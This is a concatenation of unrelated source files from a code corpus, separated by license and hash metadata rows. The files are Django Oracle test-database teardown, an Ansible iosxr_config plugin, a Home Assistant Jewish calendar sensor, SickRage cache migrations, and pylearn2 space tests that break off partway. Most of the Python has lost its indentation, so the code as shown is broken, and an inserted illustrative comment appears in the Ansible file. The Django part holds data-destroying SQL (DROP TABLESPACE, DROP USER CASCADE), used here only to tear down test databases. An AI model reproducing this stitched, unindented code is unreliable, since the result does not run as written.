print("_execute_test_db_destruction(): dbname=%s" % parameters['dbname'])
statements = [
'DROP TABLESPACE %(tblspace)s INCLUDING CONTENTS AND DATAFILES CASCADE CONSTRAINTS',
'DROP TABLESPACE %(tblspace_temp)s INCLUDING CONTENTS AND DATAFILES CASCADE CONSTRAINTS',
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _destroy_test_user(self, cursor, parameters, verbosity):
if verbosity >= 2:
print("_destroy_test_user(): user=%s" % parameters['user'])
print("Be patient. This can take some time...")
statements = [
'DROP USER %(user)s CASCADE',
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _execute_statements(self, cursor, statements, parameters, verbosity):
for template in statements:
stmt = template % parameters
if verbosity >= 2:
print(stmt)
try:
cursor.execute(stmt)
except Exception as err:
sys.stderr.write("Failed (%s)\n" % (err))
raise
def _test_database_name(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME']
try:
if self.connection.settings_dict['TEST_NAME']:
name = self.connection.settings_dict['TEST_NAME']
except AttributeError:
pass
return name
def _test_database_create(self):
return self.connection.settings_dict.get('TEST_CREATE', True)
def _test_user_create(self):
return self.connection.settings_dict.get('TEST_USER_CREATE', True)
def _test_database_user(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['USER']
try:
if self.connection.settings_dict['TEST_USER']:
name = self.connection.settings_dict['TEST_USER']
except KeyError:
pass
return name
def _test_database_passwd(self):
name = PASSWORD
try:
if self.connection.settings_dict['TEST_PASSWD']:
name = self.connection.settings_dict['TEST_PASSWD']
except KeyError:
pass
return name
def _test_database_tblspace(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME']
try:
if self.connection.settings_dict['TEST_TBLSPACE']:
name = self.connection.settings_dict['TEST_TBLSPACE']
except KeyError:
pass
return name
def _test_database_tblspace_tmp(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME'] + '_temp'
try:
if self.connection.settings_dict['TEST_TBLSPACE_TMP']:
name = self.connection.settings_dict['TEST_TBLSPACE_TMP']
except KeyError:
pass
return name
def _get_test_db_name(self):
"""
We need to return the 'production' DB name to get the test DB creation
        machinery to work. This isn't a big deal in this case because DB
        names as handled by Django don't have real counterparts in Oracle.
"""
return self.connection.settings_dict['NAME']
def test_db_signature(self):
settings_dict = self.connection.settings_dict
return (
settings_dict['HOST'],
settings_dict['PORT'],
settings_dict['ENGINE'],
settings_dict['NAME'],
self._test_database_user(),
)
| apache-2.0 | -8,043,862,175,754,762,000 | 43.516245 | 155 | 0.561268 | false |
bjolivot/ansible | lib/ansible/plugins/action/iosxr_config.py | 79 | 4164 | #
# (c) 2017, Red Hat, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import re
import time
import glob
from ansible.plugins.action.iosxr import ActionModule as _ActionModule
from ansible.module_utils._text import to_text
from ansible.module_utils.six.moves.urllib.parse import urlsplit
from ansible.utils.vars import merge_hash
PRIVATE_KEYS_RE = re.compile('__.+__')
class ActionModule(_ActionModule):
def run(self, tmp=None, task_vars=None):
if self._task.args.get('src'):
try:
self._handle_template()
except ValueError as exc:
return dict(failed=True, msg=exc.message)
result = super(ActionModule, self).run(tmp, task_vars)
if self._task.args.get('backup') and result.get('__backup__'):
# User requested backup and no error occurred in module.
# NOTE: If there is a parameter error, _backup key may not be in results.
filepath = self._write_backup(task_vars['inventory_hostname'],
result['__backup__'])
result['backup_path'] = filepath
# strip out any keys that have two leading and two trailing
# underscore characters
for key in result.keys():
if PRIVATE_KEYS_RE.match(key):
del result[key]
return result
def _get_working_path(self):
cwd = self._loader.get_basedir()
if self._task._role is not None:
cwd = self._task._role._role_path
return cwd
def _write_backup(self, host, contents):
backup_path = self._get_working_path() + '/backup'
if not os.path.exists(backup_path):
os.mkdir(backup_path)
for fn in glob.glob('%s/%s*' % (backup_path, host)):
os.remove(fn)
tstamp = time.strftime("%Y-%m-%d@%H:%M:%S", time.localtime(time.time()))
filename = '%s/%s_config.%s' % (backup_path, host, tstamp)
open(filename, 'w').write(contents)
return filename
def _handle_template(self):
src = self._task.args.get('src')
working_path = self._get_working_path()
        if os.path.isabs(src) or urlsplit(src).scheme:
source = src
else:
source = self._loader.path_dwim_relative(working_path, 'templates', src)
if not source:
source = self._loader.path_dwim_relative(working_path, src)
if not os.path.exists(source):
raise ValueError('path specified in src not found')
try:
with open(source, 'r') as f:
template_data = to_text(f.read())
except IOError:
return dict(failed=True, msg='unable to load src file')
# Create a template search path in the following order:
# [working_path, self_role_path, dependent_role_paths, dirname(source)]
searchpath = [working_path]
if self._task._role is not None:
searchpath.append(self._task._role._role_path)
if hasattr(self._task, "_block:"):
dep_chain = self._task._block.get_dep_chain()
if dep_chain is not None:
for role in dep_chain:
searchpath.append(role._role_path)
searchpath.append(os.path.dirname(source))
self._templar.environment.loader.searchpath = searchpath
self._task.args['src'] = self._templar.template(template_data)
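# --- Illustrative usage (an assumption, not part of Ansible): a playbook task
# --- exercising the src template handling and backup logic implemented above.
# --- The template path is hypothetical.
#
#   - iosxr_config:
#       src: templates/base_config.j2
#       backup: yes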
| gpl-3.0 | 4,619,096,043,227,065,000 | 36.178571 | 85 | 0.615034 | false |
home-assistant/home-assistant | homeassistant/components/jewish_calendar/sensor.py | 5 | 6627 | """Platform to retrieve Jewish calendar information for Home Assistant."""
import logging
import hdate
from homeassistant.components.sensor import SensorEntity
from homeassistant.const import DEVICE_CLASS_TIMESTAMP, SUN_EVENT_SUNSET
from homeassistant.helpers.sun import get_astral_event_date
import homeassistant.util.dt as dt_util
from . import DOMAIN, SENSOR_TYPES
_LOGGER = logging.getLogger(__name__)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up the Jewish calendar sensor platform."""
if discovery_info is None:
return
sensors = [
JewishCalendarSensor(hass.data[DOMAIN], sensor, sensor_info)
for sensor, sensor_info in SENSOR_TYPES["data"].items()
]
sensors.extend(
JewishCalendarTimeSensor(hass.data[DOMAIN], sensor, sensor_info)
for sensor, sensor_info in SENSOR_TYPES["time"].items()
)
async_add_entities(sensors)
class JewishCalendarSensor(SensorEntity):
"""Representation of an Jewish calendar sensor."""
def __init__(self, data, sensor, sensor_info):
"""Initialize the Jewish calendar sensor."""
self._location = data["location"]
self._type = sensor
self._name = f"{data['name']} {sensor_info[0]}"
self._icon = sensor_info[1]
self._hebrew = data["language"] == "hebrew"
self._candle_lighting_offset = data["candle_lighting_offset"]
self._havdalah_offset = data["havdalah_offset"]
self._diaspora = data["diaspora"]
self._state = None
self._prefix = data["prefix"]
self._holiday_attrs = {}
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def unique_id(self) -> str:
"""Generate a unique id."""
return f"{self._prefix}_{self._type}"
@property
def icon(self):
"""Icon to display in the front end."""
return self._icon
@property
def state(self):
"""Return the state of the sensor."""
return self._state
async def async_update(self):
"""Update the state of the sensor."""
now = dt_util.now()
_LOGGER.debug("Now: %s Location: %r", now, self._location)
today = now.date()
sunset = dt_util.as_local(
get_astral_event_date(self.hass, SUN_EVENT_SUNSET, today)
)
_LOGGER.debug("Now: %s Sunset: %s", now, sunset)
daytime_date = hdate.HDate(today, diaspora=self._diaspora, hebrew=self._hebrew)
# The Jewish day starts after darkness (called "tzais") and finishes at
# sunset ("shkia"). The time in between is a gray area (aka "Bein
# Hashmashot" - literally: "in between the sun and the moon").
# For some sensors, it is more interesting to consider the date to be
# tomorrow based on sunset ("shkia"), for others based on "tzais".
# Hence the following variables.
after_tzais_date = after_shkia_date = daytime_date
today_times = self.make_zmanim(today)
if now > sunset:
after_shkia_date = daytime_date.next_day
if today_times.havdalah and now > today_times.havdalah:
after_tzais_date = daytime_date.next_day
self._state = self.get_state(daytime_date, after_shkia_date, after_tzais_date)
_LOGGER.debug("New value for %s: %s", self._type, self._state)
def make_zmanim(self, date):
"""Create a Zmanim object."""
return hdate.Zmanim(
date=date,
location=self._location,
candle_lighting_offset=self._candle_lighting_offset,
havdalah_offset=self._havdalah_offset,
hebrew=self._hebrew,
)
@property
def extra_state_attributes(self):
"""Return the state attributes."""
if self._type != "holiday":
return {}
return self._holiday_attrs
def get_state(self, daytime_date, after_shkia_date, after_tzais_date):
"""For a given type of sensor, return the state."""
# Terminology note: by convention in py-libhdate library, "upcoming"
# refers to "current" or "upcoming" dates.
if self._type == "date":
return after_shkia_date.hebrew_date
if self._type == "weekly_portion":
# Compute the weekly portion based on the upcoming shabbat.
return after_tzais_date.upcoming_shabbat.parasha
if self._type == "holiday":
self._holiday_attrs["id"] = after_shkia_date.holiday_name
self._holiday_attrs["type"] = after_shkia_date.holiday_type.name
self._holiday_attrs["type_id"] = after_shkia_date.holiday_type.value
return after_shkia_date.holiday_description
if self._type == "omer_count":
return after_shkia_date.omer_day
if self._type == "daf_yomi":
return daytime_date.daf_yomi
return None
class JewishCalendarTimeSensor(JewishCalendarSensor):
"""Implement attrbutes for sensors returning times."""
@property
def state(self):
"""Return the state of the sensor."""
return dt_util.as_utc(self._state) if self._state is not None else None
@property
def device_class(self):
"""Return the class of this sensor."""
return DEVICE_CLASS_TIMESTAMP
@property
def extra_state_attributes(self):
"""Return the state attributes."""
attrs = {}
if self._state is None:
return attrs
return attrs
def get_state(self, daytime_date, after_shkia_date, after_tzais_date):
"""For a given type of sensor, return the state."""
if self._type == "upcoming_shabbat_candle_lighting":
times = self.make_zmanim(
after_tzais_date.upcoming_shabbat.previous_day.gdate
)
return times.candle_lighting
if self._type == "upcoming_candle_lighting":
times = self.make_zmanim(
after_tzais_date.upcoming_shabbat_or_yom_tov.first_day.previous_day.gdate
)
return times.candle_lighting
if self._type == "upcoming_shabbat_havdalah":
times = self.make_zmanim(after_tzais_date.upcoming_shabbat.gdate)
return times.havdalah
if self._type == "upcoming_havdalah":
times = self.make_zmanim(
after_tzais_date.upcoming_shabbat_or_yom_tov.last_day.gdate
)
return times.havdalah
times = self.make_zmanim(dt_util.now()).zmanim
return times[self._type]
| apache-2.0 | 2,915,521,554,264,026,000 | 34.438503 | 89 | 0.615211 | false |
sharkykh/SickRage | sickbeard/databases/cache_db.py | 5 | 5192 | # coding=utf-8
# Author: Nic Wolfe <[email protected]>
# URL: https://sickrage.github.io
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from sickbeard import db
# Add new migrations at the bottom of the list; subclass the previous migration.
class InitialSchema(db.SchemaUpgrade):
def test(self):
return self.hasTable("db_version")
def execute(self):
queries = [
("CREATE TABLE lastUpdate (provider TEXT, time NUMERIC);",),
("CREATE TABLE lastSearch (provider TEXT, time NUMERIC);",),
("CREATE TABLE scene_exceptions (exception_id INTEGER PRIMARY KEY, indexer_id INTEGER, show_name TEXT, season NUMERIC DEFAULT -1, custom NUMERIC DEFAULT 0);",),
("CREATE TABLE scene_names (indexer_id INTEGER, name TEXT);",),
("CREATE TABLE network_timezones (network_name TEXT PRIMARY KEY, timezone TEXT);",),
("CREATE TABLE scene_exceptions_refresh (list TEXT PRIMARY KEY, last_refreshed INTEGER);",),
("CREATE TABLE db_version (db_version INTEGER);",),
("INSERT INTO db_version(db_version) VALUES (1);",),
]
for query in queries:
if len(query) == 1:
self.connection.action(query[0])
else:
self.connection.action(query[0], query[1:])
class AddSceneExceptions(InitialSchema):
def test(self):
return self.hasTable("scene_exceptions")
def execute(self):
self.connection.action(
"CREATE TABLE scene_exceptions (exception_id INTEGER PRIMARY KEY, indexer_id INTEGER, show_name TEXT);")
class AddSceneNameCache(AddSceneExceptions):
def test(self):
return self.hasTable("scene_names")
def execute(self):
self.connection.action("CREATE TABLE scene_names (indexer_id INTEGER, name TEXT);")
class AddNetworkTimezones(AddSceneNameCache):
def test(self):
return self.hasTable("network_timezones")
def execute(self):
self.connection.action("CREATE TABLE network_timezones (network_name TEXT PRIMARY KEY, timezone TEXT);")
class AddLastSearch(AddNetworkTimezones):
def test(self):
return self.hasTable("lastSearch")
def execute(self):
self.connection.action("CREATE TABLE lastSearch (provider TEXT, time NUMERIC);")
class AddSceneExceptionsSeasons(AddLastSearch):
def test(self):
return self.hasColumn("scene_exceptions", "season")
def execute(self):
self.addColumn("scene_exceptions", "season", "NUMERIC", -1)
class AddSceneExceptionsCustom(AddSceneExceptionsSeasons): # pylint:disable=too-many-ancestors
def test(self):
return self.hasColumn("scene_exceptions", "custom")
def execute(self):
self.addColumn("scene_exceptions", "custom", "NUMERIC", 0)
class AddSceneExceptionsRefresh(AddSceneExceptionsCustom): # pylint:disable=too-many-ancestors
def test(self):
return self.hasTable("scene_exceptions_refresh")
def execute(self):
self.connection.action(
"CREATE TABLE scene_exceptions_refresh (list TEXT PRIMARY KEY, last_refreshed INTEGER);")
class ConvertSceneExeptionsToIndexerScheme(AddSceneExceptionsRefresh): # pylint:disable=too-many-ancestors
def test(self):
return self.hasColumn("scene_exceptions", "indexer_id")
def execute(self):
self.connection.action("DROP TABLE IF EXISTS tmp_scene_exceptions;")
self.connection.action("ALTER TABLE scene_exceptions RENAME TO tmp_scene_exceptions;")
self.connection.action("CREATE TABLE scene_exceptions (exception_id INTEGER PRIMARY KEY, indexer_id INTEGER, show_name TEXT, season NUMERIC DEFAULT -1, custom NUMERIC DEFAULT 0);")
self.connection.action("INSERT INTO scene_exceptions SELECT exception_id, tvdb_id as indexer_id, show_name, season, custom FROM tmp_scene_exceptions;")
self.connection.action("DROP TABLE tmp_scene_exceptions;")
class ConvertSceneNamesToIndexerScheme(AddSceneExceptionsRefresh): # pylint:disable=too-many-ancestors
def test(self):
return self.hasColumn("scene_names", "indexer_id")
def execute(self):
self.connection.action("DROP TABLE IF EXISTS tmp_scene_names;")
self.connection.action("ALTER TABLE scene_names RENAME TO tmp_scene_names;")
self.connection.action("CREATE TABLE scene_names (indexer_id INTEGER, name TEXT);")
self.connection.action("INSERT INTO scene_names SELECT * FROM tmp_scene_names;")
self.connection.action("DROP TABLE tmp_scene_names;")
| gpl-3.0 | -6,024,445,507,122,998,000 | 39.5625 | 188 | 0.699153 | false |
daemonmaker/pylearn2 | pylearn2/space/tests/test_space.py | 32 | 58117 | """
Tests for space utilities.
"""
from __future__ import print_function
import itertools
import warnings
import numpy as np
from theano.compat.six.moves import xrange
import theano
from theano import tensor
# Can't use nose.tools.assert_raises, only introduced in python 2.7. Use
# numpy.testing.assert_raises instead
from pylearn2.space import (SimplyTypedSpace,
VectorSpace,
Conv2DSpace,
CompositeSpace,
VectorSequenceSpace,
IndexSequenceSpace,
IndexSpace,
NullSpace,
is_symbolic_batch)
from pylearn2.utils import function, safe_zip
def test_np_format_as_vector2vector():
vector_space_initial = VectorSpace(dim=8 * 8 * 3, sparse=False)
vector_space_final = VectorSpace(dim=8 * 8 * 3, sparse=False)
data = np.arange(5 * 8 * 8 * 3).reshape(5, 8 * 8 * 3)
rval = vector_space_initial.np_format_as(data, vector_space_final)
assert np.all(rval == data)
def test_np_format_as_index2index():
index_space_initial = IndexSpace(max_labels=10, dim=1)
index_space_final = IndexSpace(max_labels=10, dim=1)
data = np.array([[0], [2], [1], [3], [5], [8], [1]])
rval = index_space_initial.np_format_as(data, index_space_final)
assert index_space_initial == index_space_final
assert np.all(rval == data)
index_space_downcast = IndexSpace(max_labels=10, dim=1, dtype='int32')
rval = index_space_initial.np_format_as(data, index_space_downcast)
assert index_space_initial != index_space_downcast
assert np.all(rval == data)
assert rval.dtype == 'int32' and data.dtype == 'int64'
def test_np_format_as_conv2d2conv2d():
conv2d_space_initial = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('b', 'c', 0, 1))
conv2d_space_final = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('b', 'c', 0, 1))
data = np.arange(5 * 8 * 8 * 3).reshape(5, 3, 8, 8)
rval = conv2d_space_initial.np_format_as(data, conv2d_space_final)
assert np.all(rval == data)
conv2d_space1 = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('c', 'b', 1, 0))
conv2d_space0 = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('b', 'c', 0, 1))
data = np.arange(5 * 8 * 8 * 3).reshape(5, 3, 8, 8)
rval = conv2d_space0.np_format_as(data, conv2d_space1)
nval = data.transpose(1, 0, 3, 2)
assert np.all(rval == nval)
def test_np_format_as_vector2conv2d():
vector_space = VectorSpace(dim=8 * 8 * 3, sparse=False)
conv2d_space = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('b', 'c', 0, 1))
data = np.arange(5 * 8 * 8 * 3).reshape(5, 8 * 8 * 3)
rval = vector_space.np_format_as(data, conv2d_space)
# Get data in a Conv2DSpace with default axes
new_axes = conv2d_space.default_axes
axis_to_shape = {'b': 5, 'c': 3, 0: 8, 1: 8}
new_shape = tuple([axis_to_shape[ax] for ax in new_axes])
nval = data.reshape(new_shape)
# Then transpose
nval = nval.transpose(*[new_axes.index(ax)
for ax in conv2d_space.axes])
assert np.all(rval == nval)
def test_np_format_as_conv2d2vector():
vector_space = VectorSpace(dim=8 * 8 * 3, sparse=False)
conv2d_space = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('b', 'c', 0, 1))
data = np.arange(5 * 8 * 8 * 3).reshape(5, 3, 8, 8)
rval = conv2d_space.np_format_as(data, vector_space)
nval = data.transpose(*[conv2d_space.axes.index(ax)
for ax in conv2d_space.default_axes])
nval = nval.reshape(5, 3 * 8 * 8)
assert np.all(rval == nval)
vector_space = VectorSpace(dim=8 * 8 * 3, sparse=False)
conv2d_space = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('c', 'b', 0, 1))
data = np.arange(5 * 8 * 8 * 3).reshape(3, 5, 8, 8)
rval = conv2d_space.np_format_as(data, vector_space)
nval = data.transpose(*[conv2d_space.axes.index(ax)
for ax in conv2d_space.default_axes])
nval = nval.reshape(5, 3 * 8 * 8)
assert np.all(rval == nval)
def test_np_format_as_conv2d_vector_conv2d():
conv2d_space1 = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('c', 'b', 1, 0))
vector_space = VectorSpace(dim=8 * 8 * 3, sparse=False)
conv2d_space0 = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('b', 'c', 0, 1))
data = np.arange(5 * 8 * 8 * 3).reshape(5, 3, 8, 8)
vecval = conv2d_space0.np_format_as(data, vector_space)
rval1 = vector_space.np_format_as(vecval, conv2d_space1)
rval2 = conv2d_space0.np_format_as(data, conv2d_space1)
assert np.allclose(rval1, rval2)
nval = data.transpose(1, 0, 3, 2)
assert np.allclose(nval, rval1)
def test_np_format_as_vectorsequence2vectorsequence():
vector_sequence_space1 = VectorSequenceSpace(dim=3, dtype='float32')
vector_sequence_space2 = VectorSequenceSpace(dim=3, dtype='float64')
data = np.asarray(np.random.uniform(low=0.0,
high=1.0,
size=(10, 3)),
dtype=vector_sequence_space1.dtype)
rval = vector_sequence_space1.np_format_as(data, vector_sequence_space2)
assert np.all(rval == data)
def test_np_format_as_indexsequence2indexsequence():
index_sequence_space1 = IndexSequenceSpace(max_labels=6, dim=1,
dtype='int16')
index_sequence_space2 = IndexSequenceSpace(max_labels=6, dim=1,
dtype='int32')
data = np.asarray(np.random.randint(low=0,
high=5,
size=(10, 1)),
dtype=index_sequence_space1.dtype)
rval = index_sequence_space1.np_format_as(data, index_sequence_space2)
assert np.all(rval == data)
def test_np_format_as_indexsequence2vectorsequence():
index_sequence_space = IndexSequenceSpace(max_labels=6, dim=1)
vector_sequence_space = VectorSequenceSpace(dim=6)
data = np.array([[0], [1], [4], [3]],
dtype=index_sequence_space.dtype)
rval = index_sequence_space.np_format_as(data, vector_sequence_space)
true_val = np.array([[1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 1, 0, 0]])
assert np.all(rval == true_val)
def test_np_format_as_sequence2other():
vector_sequence_space = VectorSequenceSpace(dim=3)
vector_space = VectorSpace(dim=3)
data = np.random.uniform(low=0.0, high=1.0, size=(10, 3))
np.testing.assert_raises(ValueError, vector_sequence_space.np_format_as,
data, vector_space)
index_sequence_space = IndexSequenceSpace(max_labels=6, dim=1)
index_space = IndexSpace(max_labels=6, dim=1)
data = np.random.randint(low=0, high=5, size=(10, 1))
np.testing.assert_raises(ValueError, index_sequence_space.np_format_as,
data, index_space)
def test_np_format_as_composite_composite():
"""
Test using CompositeSpace.np_format_as() to convert between
composite spaces that have the same tree structure, but different
leaf spaces.
"""
def make_composite_space(image_space):
"""
        Returns a composite space with a particular tree structure.
"""
return CompositeSpace((CompositeSpace((image_space,) * 2),
VectorSpace(dim=1)))
shape = np.array([8, 11])
channels = 3
datum_size = channels * shape.prod()
composite_topo = make_composite_space(Conv2DSpace(shape=shape,
num_channels=channels))
composite_flat = make_composite_space(VectorSpace(dim=datum_size))
def make_vector_data(batch_size, space):
"""
Returns a batch of synthetic data appropriate to the provided space.
        Supports VectorSpaces, and CompositeSpaces of VectorSpaces.
"""
if isinstance(space, CompositeSpace):
return tuple(make_vector_data(batch_size, subspace)
for subspace in space.components)
else:
assert isinstance(space, VectorSpace)
result = np.random.rand(batch_size, space.dim)
if space.dtype is not None:
return np.asarray(result, dtype=space.dtype)
else:
return result
batch_size = 5
flat_data = make_vector_data(batch_size, composite_flat)
composite_flat.np_validate(flat_data)
topo_data = composite_flat.np_format_as(flat_data, composite_topo)
composite_topo.np_validate(topo_data)
new_flat_data = composite_topo.np_format_as(topo_data,
composite_flat)
def get_shape(batch):
"""
Returns the (nested) shape(s) of a (nested) batch.
"""
if isinstance(batch, np.ndarray):
return batch.shape
else:
return tuple(get_shape(b) for b in batch)
def batch_equals(batch_0, batch_1):
"""
Returns true if all corresponding elements of two batches are
equal. Supports composite data (i.e. nested tuples of data).
"""
assert type(batch_0) == type(batch_1)
if isinstance(batch_0, tuple):
if len(batch_0) != len(batch_1):
return False
return np.all(tuple(batch_equals(b0, b1)
for b0, b1 in zip(batch_0, batch_1)))
else:
assert isinstance(batch_0, np.ndarray)
return np.all(batch_0 == batch_1)
assert batch_equals(new_flat_data, flat_data)
def test_vector_to_conv_c01b_invertible():
"""
Tests that the format_as methods between Conv2DSpace
and VectorSpace are invertible for the ('c', 0, 1, 'b')
axis format.
"""
rng = np.random.RandomState([2013, 5, 1])
batch_size = 3
rows = 4
cols = 5
channels = 2
conv = Conv2DSpace([rows, cols],
channels=channels,
axes=('c', 0, 1, 'b'))
vec = VectorSpace(conv.get_total_dimension())
X = conv.make_batch_theano()
Y = conv.format_as(X, vec)
Z = vec.format_as(Y, conv)
A = vec.make_batch_theano()
B = vec.format_as(A, conv)
C = conv.format_as(B, vec)
f = function([X, A], [Z, C])
X = rng.randn(*(conv.get_origin_batch(batch_size).shape)).astype(X.dtype)
A = rng.randn(*(vec.get_origin_batch(batch_size).shape)).astype(A.dtype)
Z, C = f(X, A)
np.testing.assert_allclose(Z, X)
np.testing.assert_allclose(C, A)
def test_broadcastable():
v = VectorSpace(5).make_theano_batch(batch_size=1)
np.testing.assert_(v.broadcastable[0])
c = Conv2DSpace((5, 5), channels=3,
axes=['c', 0, 1, 'b']).make_theano_batch(batch_size=1)
np.testing.assert_(c.broadcastable[-1])
d = Conv2DSpace((5, 5), channels=3,
axes=['b', 0, 1, 'c']).make_theano_batch(batch_size=1)
np.testing.assert_(d.broadcastable[0])
def test_compare_index():
dims = [5, 5, 5, 6]
max_labels = [10, 10, 9, 10]
index_spaces = [IndexSpace(dim=dim, max_labels=max_label)
for dim, max_label in zip(dims, max_labels)]
assert index_spaces[0] == index_spaces[1]
assert not any(index_spaces[i] == index_spaces[j]
for i, j in itertools.combinations([1, 2, 3], 2))
vector_space = VectorSpace(dim=5)
conv2d_space = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('b', 'c', 0, 1))
composite_space = CompositeSpace((index_spaces[0],))
assert not any(index_space == vector_space for index_space in index_spaces)
assert not any(index_space == composite_space
for index_space in index_spaces)
assert not any(index_space == conv2d_space for index_space in index_spaces)
def test_np_format_as_index2vector():
# Test 5 random batches for shape, number of non-zeros
for _ in xrange(5):
max_labels = np.random.randint(2, 10)
batch_size = np.random.randint(1, 10)
labels = np.random.randint(1, 10)
batch = np.random.random_integers(max_labels - 1,
size=(batch_size, labels))
index_space = IndexSpace(dim=labels, max_labels=max_labels)
vector_space_merge = VectorSpace(dim=max_labels)
vector_space_concatenate = VectorSpace(dim=max_labels * labels)
merged = index_space.np_format_as(batch, vector_space_merge)
concatenated = index_space.np_format_as(batch,
vector_space_concatenate)
assert merged.shape == (batch_size, max_labels)
assert concatenated.shape == (batch_size, max_labels * labels)
assert np.count_nonzero(merged) <= batch.size
assert np.count_nonzero(concatenated) == batch.size
assert np.all(np.unique(concatenated) == np.array([0, 1]))
# Make sure Theano variables give the same result
batch = tensor.lmatrix('batch')
single = tensor.lvector('single')
batch_size = np.random.randint(1, 10)
np_batch = np.random.random_integers(max_labels - 1,
size=(batch_size, labels))
np_single = np.random.random_integers(max_labels - 1,
size=(labels))
f_batch_merge = theano.function(
[batch], index_space._format_as_impl(False, batch, vector_space_merge)
)
f_batch_concatenate = theano.function(
[batch], index_space._format_as_impl(False, batch,
vector_space_concatenate)
)
f_single_merge = theano.function(
[single], index_space._format_as_impl(False, single,
vector_space_merge)
)
f_single_concatenate = theano.function(
[single], index_space._format_as_impl(False, single,
vector_space_concatenate)
)
np.testing.assert_allclose(
f_batch_merge(np_batch),
index_space._format_as_impl(True, np_batch, vector_space_merge)
)
np.testing.assert_allclose(
f_batch_concatenate(np_batch),
index_space._format_as_impl(True, np_batch, vector_space_concatenate)
)
np.testing.assert_allclose(
f_single_merge(np_single),
index_space._format_as_impl(True, np_single, vector_space_merge)
)
np.testing.assert_allclose(
f_single_concatenate(np_single),
index_space._format_as_impl(True, np_single, vector_space_concatenate)
)
def test_dtypes():
batch_size = 2
dtype_is_none_msg = ("self.dtype is None, so you must provide a "
"non-None dtype argument to this method.")
all_scalar_dtypes = tuple(t.dtype
for t in theano.scalar.all_types)
def underspecifies_dtypes(from_space, to_dtype):
"""
Returns True iff the from_space and to_dtype are both None. If
from_space is a CompositeSpace, this recurses into its tree of
subspaces.
"""
if isinstance(from_space, CompositeSpace):
if not isinstance(to_dtype, tuple):
return any(underspecifies_dtypes(s, to_dtype)
for s in from_space.components)
else:
return any(underspecifies_dtypes(s, d)
for s, d
in safe_zip(from_space.components, to_dtype))
else:
assert not isinstance(to_dtype, tuple), ("Tree structure "
"mismatch between "
"from_space and "
"to_dtype.")
return from_space.dtype is None and to_dtype is None
def get_expected_batch_dtype(from_space, to_dtype):
"""
Returns the expected dtype of a batch returned from
        from_space.f(batch_size, dtype=to_dtype), where f is one of the three batch
creation methods (get_origin_batch, make_theano_batch, and
make_shared_batch)
"""
if to_dtype == 'floatX':
to_dtype = theano.config.floatX
if isinstance(from_space, CompositeSpace):
if not isinstance(to_dtype, tuple):
to_dtype = (to_dtype, ) * len(from_space.components)
return tuple(get_expected_batch_dtype(subspace, subtype)
for subspace, subtype
in safe_zip(from_space.components, to_dtype))
else:
assert not (from_space.dtype is None and to_dtype is None)
return from_space.dtype if to_dtype is None else to_dtype
def get_batch_dtype(batch):
"""
Returns the dtype of a batch, as a string, or nested tuple of strings.
For simple batches such as ndarray, this returns str(batch.dtype).
For the None batches "used" by NullSpace, this returns a special string
"NullSpace dtype".
For composite batches, this returns (nested) tuples of dtypes.
"""
if isinstance(batch, tuple):
return tuple(get_batch_dtype(b) for b in batch)
elif batch is None:
return "NullSpace dtype"
else:
return batch.dtype
def test_get_origin_batch(from_space, to_type):
# Expect failure if neither we nor the from_space specifies a dtype
if underspecifies_dtypes(from_space, to_type):
try:
from_space.get_origin_batch(batch_size, dtype=to_type)
except TypeError as ex:
assert dtype_is_none_msg in str(ex)
except Exception as unexpected_ex:
print("Expected an exception of type TypeError with message "
"%s, got a %s instead with message %s." %
(dtype_is_none_msg,
type(unexpected_ex),
str(unexpected_ex)))
raise unexpected_ex
finally:
return
batch = from_space.get_origin_batch(batch_size, dtype=to_type)
assert get_batch_dtype(batch) == get_expected_batch_dtype(from_space,
to_type)
def test_make_shared_batch(from_space, to_type):
if underspecifies_dtypes(from_space, to_type):
try:
from_space.make_shared_batch(batch_size, dtype=to_type)
except TypeError as ex:
assert dtype_is_none_msg in str(ex)
except Exception as unexpected_ex:
print("Expected an exception of type TypeError with message "
"%s, got a %s instead with message %s." %
(dtype_is_none_msg,
type(unexpected_ex),
str(unexpected_ex)))
raise unexpected_ex
finally:
return
batch = from_space.make_shared_batch(batch_size=batch_size,
name='batch',
dtype=to_type)
assert (get_batch_dtype(batch) ==
get_expected_batch_dtype(from_space, to_type)), \
("\nget_batch_dtype(batch): %s\n"
"get_expected_batch_dtype(from_space, to_type): %s" %
(get_batch_dtype(batch),
get_expected_batch_dtype(from_space, to_type)))
def test_make_theano_batch(from_space, to_type):
kwargs = {'name': 'batch',
'dtype': to_type}
